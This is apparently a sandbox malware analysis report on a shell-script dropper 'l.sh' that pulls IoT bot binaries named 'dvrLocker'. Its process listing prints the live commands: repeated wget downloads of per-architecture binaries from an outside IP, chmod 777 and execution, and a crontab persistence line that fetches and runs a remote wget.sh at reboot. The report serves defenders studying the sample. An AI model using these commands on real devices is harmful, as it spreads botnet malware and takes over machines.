Analysis
-
max time kernel
106s -
max time network
142s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
09-11-2024 08:41
Static task
static1
Behavioral task
behavioral1
Sample
l.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
l.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
l.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
l.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
l.sh
-
Size
916B
-
MD5
19c4fe1b103747e55af818fc3f07fdbe
-
SHA1
ccb4350c6ce8bb9449a9dc5dfa4910762d1d9fe8
-
SHA256
7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
-
SHA512
2d3f697da5886721e51cbc720a77c9c755027d361a7e139de80be1ee5c2dd1c76a20d3c33fb32177a5318400fbec36555c93cd9b860e398b5b1fd73e3c5fa270
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 22 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
shchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 838 sh 881 chmod 909 chmod 933 chmod 835 chmod 849 chmod 901 chmod 905 chmod 824 chmod 929 chmod 941 chmod 897 chmod 876 chmod 885 chmod 889 chmod 893 chmod 913 chmod 917 chmod 921 chmod 872 chmod 937 chmod 925 chmod -
Executes dropped EXE 8 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid process /tmp/lib/dvrLocker 826 dvrLocker /tmp/lib/dvrLocker 837 dvrLocker /tmp/lib/dvrLocker 850 dvrLocker /tmp/lib/dvrLocker 857 dvrLocker /tmp/lib/dvrLocker 865 dvrLocker /tmp/lib/dvrLocker 869 dvrLocker /tmp/lib/dvrLocker 873 dvrLocker /tmp/lib/dvrLocker 877 dvrLocker -
Renames itself 1 IoCs
Processes:
dvrLockerpid process 837 dvrLocker -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 202.61.197.122 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.cK7Kfe crontab -
Changes its process name 1 IoCs
Processes:
dvrLockerdescription ioc pid process Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd 837 dvrLocker -
Processes:
lslslsdvrLockercrontablslslslslslslslslslslslslslslslslslslslslslsdescription ioc process File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/894/status dvrLocker File opened for reading /proc/filesystems crontab File opened for reading /proc/857/status dvrLocker File opened for reading /proc/874/status dvrLocker File opened for reading /proc/876/status dvrLocker File opened for reading /proc/895/status dvrLocker File opened for reading /proc/907/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/938/status dvrLocker File opened for reading /proc/852/status dvrLocker File opened for reading /proc/889/status dvrLocker File opened for reading /proc/914/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/711/cmdline dvrLocker File opened for reading /proc/858/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/948/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/865/status dvrLocker File opened for reading /proc/882/status dvrLocker File opened for reading /proc/919/status dvrLocker File opened for reading /proc/937/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/881/status dvrLocker File opened for reading /proc/886/status dvrLocker File opened for reading /proc/905/status dvrLocker File opened for reading /proc/920/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/856/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/909/status dvrLocker File opened for reading /proc/916/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/915/status dvrLocker File opened for reading /proc/926/status dvrLocker File opened for reading /proc/851/status dvrLocker File opened for reading /proc/899/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/858/cmdline dvrLocker File opened for reading /proc/896/status dvrLocker File opened for reading /proc/913/status dvrLocker File opened for reading /proc/923/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/942/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/859/status dvrLocker File opened for reading /proc/869/status dvrLocker File opened for reading /proc/872/status dvrLocker File opened for reading /proc/877/status dvrLocker File opened for reading /proc/903/status dvrLocker File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetwgetrmwgetrmpid process 884 wget 916 wget 919 rm 829 wget 847 rm -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
l.shdescription ioc process File opened for modification /tmp/lib/dvrLocker l.sh
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
- Writes file to tmp directory
PID:711 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:714 -
/bin/lsls -l /proc/10/exe2⤵PID:720
-
/bin/lsls -l /proc/11/exe2⤵
- Reads runtime system information
PID:724 -
/bin/lsls -l /proc/111/exe2⤵PID:727
-
/bin/lsls -l /proc/12/exe2⤵
- Reads runtime system information
PID:731 -
/bin/lsls -l /proc/121/exe2⤵PID:732
-
/bin/lsls -l /proc/122/exe2⤵
- Reads runtime system information
PID:735 -
/bin/lsls -l /proc/13/exe2⤵PID:736
-
/bin/lsls -l /proc/14/exe2⤵PID:739
-
/bin/lsls -l /proc/148/exe2⤵
- Reads runtime system information
PID:740 -
/bin/lsls -l /proc/15/exe2⤵PID:741
-
/bin/lsls -l /proc/157/exe2⤵PID:744
-
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:746 -
/bin/lsls -l /proc/17/exe2⤵PID:748
-
/bin/lsls -l /proc/173/exe2⤵
- Reads runtime system information
PID:749 -
/bin/lsls -l /proc/18/exe2⤵
- Reads runtime system information
PID:750 -
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:751 -
/bin/lsls -l /proc/2/exe2⤵
- Reads runtime system information
PID:753 -
/bin/lsls -l /proc/20/exe2⤵PID:754
-
/bin/lsls -l /proc/207/exe2⤵PID:755
-
/bin/lsls -l /proc/21/exe2⤵PID:756
-
/bin/lsls -l /proc/22/exe2⤵PID:757
-
/bin/lsls -l /proc/23/exe2⤵PID:758
-
/bin/lsls -l /proc/234/exe2⤵
- Reads runtime system information
PID:759 -
/bin/lsls -l /proc/24/exe2⤵
- Reads runtime system information
PID:760 -
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:761 -
/bin/lsls -l /proc/319/exe2⤵PID:762
-
/bin/lsls -l /proc/320/exe2⤵
- Reads runtime system information
PID:763 -
/bin/lsls -l /proc/323/exe2⤵PID:764
-
/bin/lsls -l /proc/325/exe2⤵PID:765
-
/bin/lsls -l /proc/326/exe2⤵PID:766
-
/bin/lsls -l /proc/36/exe2⤵
- Reads runtime system information
PID:767 -
/bin/lsls -l /proc/37/exe2⤵
- Reads runtime system information
PID:768 -
/bin/lsls -l /proc/378/exe2⤵PID:769
-
/bin/lsls -l /proc/379/exe2⤵
- Reads runtime system information
PID:770 -
/bin/lsls -l /proc/383/exe2⤵PID:771
-
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:772 -
/bin/lsls -l /proc/427/exe2⤵PID:773
-
/bin/lsls -l /proc/5/exe2⤵PID:774
-
/bin/lsls -l /proc/6/exe2⤵PID:775
-
/bin/lsls -l /proc/665/exe2⤵PID:776
-
/bin/lsls -l /proc/668/exe2⤵PID:777
-
/bin/lsls -l /proc/671/exe2⤵
- Reads runtime system information
PID:778 -
/bin/lsls -l /proc/672/exe2⤵PID:779
-
/bin/lsls -l /proc/688/exe2⤵PID:780
-
/bin/lsls -l /proc/7/exe2⤵PID:781
-
/bin/lsls -l /proc/70/exe2⤵
- Reads runtime system information
PID:782 -
/bin/lsls -l /proc/701/exe2⤵PID:783
-
/bin/lsls -l /proc/702/exe2⤵
- Reads runtime system information
PID:784 -
/bin/lsls -l /proc/705/exe2⤵PID:785
-
/bin/lsls -l /proc/708/exe2⤵PID:786
-
/bin/lsls -l /proc/709/exe2⤵PID:787
-
/bin/lsls -l /proc/71/exe2⤵PID:788
-
/bin/lsls -l /proc/711/exe2⤵PID:789
-
/bin/lsls -l /proc/712/exe2⤵
- Reads runtime system information
PID:790 -
/bin/lsls -l /proc/713/exe2⤵PID:791
-
/bin/lsls -l /proc/72/exe2⤵
- Reads runtime system information
PID:793 -
/bin/lsls -l /proc/73/exe2⤵PID:795
-
/bin/lsls -l /proc/74/exe2⤵PID:796
-
/bin/lsls -l /proc/75/exe2⤵PID:799
-
/bin/lsls -l /proc/76/exe2⤵PID:800
-
/bin/lsls -l /proc/77/exe2⤵
- Reads runtime system information
PID:802 -
/bin/lsls -l /proc/78/exe2⤵PID:805
-
/bin/lsls -l /proc/8/exe2⤵PID:807
-
/bin/lsls -l /proc/80/exe2⤵
- Reads runtime system information
PID:809 -
/bin/lsls -l /proc/82/exe2⤵PID:811
-
/bin/lsls -l /proc/9/exe2⤵PID:813
-
/bin/rmrm -rf /tmp/lib/2⤵PID:814
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:816
-
/bin/mkdirmkdir /tmp/lib/2⤵PID:817
-
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:818
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:824 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:826 -
/bin/rmrm -rf mpsl2⤵PID:828
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:829 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:835 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
- Renames itself
- Changes its process name
- Reads runtime system information
PID:837 -
/bin/shsh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"3⤵
- File and Directory Permissions Modification
PID:838 -
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:840 -
/usr/bin/crontabcrontab -l4⤵PID:841
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:847 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:849 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:850 -
/bin/rmrm -rf arm2⤵PID:852
-
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:853
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:857 -
/bin/rmrm -rf arm52⤵PID:859
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:862
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:865 -
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:867
-
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:869 -
/bin/rmrm -rf arm72⤵PID:870
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:871
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:872 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:873 -
/bin/rmrm -rf arm62⤵PID:874
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:875
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:876 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:877 -
/bin/rmrm -rf x862⤵PID:878
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:879
-
/usr/bin/wgetwget http://45.202.35.91/mpsl -O -2⤵PID:880
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:881 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:882
-
/bin/rmrm -rf mpsl2⤵PID:883
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:884 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:885 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:886
-
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:888
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:889 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:890
-
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:892
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:893 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:894
-
/bin/rmrm -rf arm52⤵PID:895
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:896
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:897 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:898
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:900
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:901 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:902
-
/bin/rmrm -rf arm72⤵PID:903
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:904
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:905 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:906
-
/bin/rmrm -rf arm62⤵PID:907
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:908
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:909 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:910
-
/bin/rmrm -rf x862⤵PID:911
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:913 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:914
-
/bin/rmrm -rf mpsl2⤵PID:915
-
/usr/bin/wgetwget http://45.202.35.91/mips -O -2⤵
- System Network Configuration Discovery
PID:916 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:917 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:918
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:919 -
/usr/bin/wgetwget http://45.202.35.91/arm -O -2⤵PID:920
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:921 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:922
-
/bin/rmrm -rf arm2⤵PID:923
-
/usr/bin/wgetwget http://45.202.35.91/arm5 -O -2⤵PID:924
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:925 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:926
-
/bin/rmrm -rf arm52⤵PID:927
-
/usr/bin/wgetwget http://45.202.35.91/ppc -O -2⤵PID:928
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:929 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:930
-
/bin/rmrm -rf ppc2⤵PID:931
-
/usr/bin/wgetwget http://45.202.35.91/arm7 -O -2⤵PID:932
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:933 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:934
-
/bin/rmrm -rf arm72⤵PID:935
-
/usr/bin/wgetwget http://45.202.35.91/arm6 -O -2⤵PID:936
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:937 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:938
-
/bin/rmrm -rf arm62⤵PID:939
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:940
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:941 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵PID:942
-
/bin/rmrm -rf x862⤵PID:943
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
100KB
MD54ad582d49f505bfab7de84881998685b
SHA15f09f4baed114b594729ded91e2c4d263f0e2754
SHA256b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA5126f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4
-
Filesize
99KB
MD5559f129d380ad1cfb60792c6b2dc3d32
SHA13997a0fc0bd5958783f1751364ec407c5b170adc
SHA256fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d
SHA5129f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112
-
Filesize
306B
MD5e728bc24eeb3365830019d50d1e8e05c
SHA1b25cfd9ccb191711a43aa90e55eeea2f1e31ea0f
SHA25668c667810359171e53c51f4d00de87821381491fbcaf7b97784cdb0fad788966
SHA51264ac0e01cd92073612b5e679daea6fcfc049f7e651047ac0d187387752fbf66551203e14e16fe6986f8ce7e53f3c9a3728dcbb996cdfdfcfeb4248328056ba73